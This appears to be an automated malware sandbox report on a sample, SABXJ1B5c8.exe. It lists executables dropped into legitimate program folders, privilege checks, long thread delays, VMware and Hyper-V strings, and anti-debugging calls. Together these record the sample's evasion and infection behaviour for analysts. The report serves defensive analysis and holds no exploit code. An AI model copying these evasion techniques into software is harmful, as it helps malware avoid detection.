Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Dropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_10-3883
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_11-3720
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_13-3882
Source: C:\Windows\SysWOW64\perfhost.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_14-74435
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_19-3894
Source: C:\Windows\System32\AppVClient.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_7-3881

Source: C:\Windows\SysWOW64\perfhost.exe

API coverage: 1.8 %

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe TID: 516	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\msdtc.exe TID: 6052	Thread sleep count: 482 > 30	Jump to behavior
Source: C:\Windows\System32\msdtc.exe TID: 6052	Thread sleep time: -48200s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe TID: 5408	Thread sleep count: 5358 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe TID: 5408	Thread sleep time: -53580000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe TID: 5408	Thread sleep count: 4640 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe TID: 5408	Thread sleep time: -46400000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\perfhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\perfhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597233
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596905
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596685
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596564
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596216
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595116
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594241
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594107
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593849
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593110

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @oYSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4NECVMWar VMware SATA CD00
Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00
Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: armsvc.exe, 00000002.00000003.2059576543.000000000094B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1817901404.0000000000947000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1844349690.000000000094B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1841325867.0000000000947000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1818400375.000000000094B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2059203379.0000000000947000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
Source: SensorDataService.exe, 00000010.00000003.1660377267.000000000057A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver0
Source: AppVClient.exe, 00000007.00000003.1595570546.00000000004F0000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000002.1596296692.000000000050E000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1595659509.00000000004F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
Source: SensorDataService.exe, 00000010.00000002.1763453967.000000000055F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Devicer\
Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: YSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: SensorDataService.exe, 00000010.00000003.1660377267.000000000057A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: RegSvcs.exe, 00000011.00000002.2850939963.0000000000B06000.00000004.00000020.00020000.00000000.sdmp, ssh-agent.exe, 00000013.00000002.2843426616.000000000041D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JVMware Virtual disk SCSI Disk Device
Source: snmptrap.exe, 00000012.00000002.2841828156.0000000000475000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}

Source: C:\Windows\SysWOW64\perfhost.exe

Code function: 14_2_008908F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

14_2_008908F1

Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00851130 mov eax, dword ptr fs:[00000030h]		14_2_00851130
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_008934CD mov eax, dword ptr fs:[00000030h]		14_2_008934CD

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_008908F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		14_2_008908F1
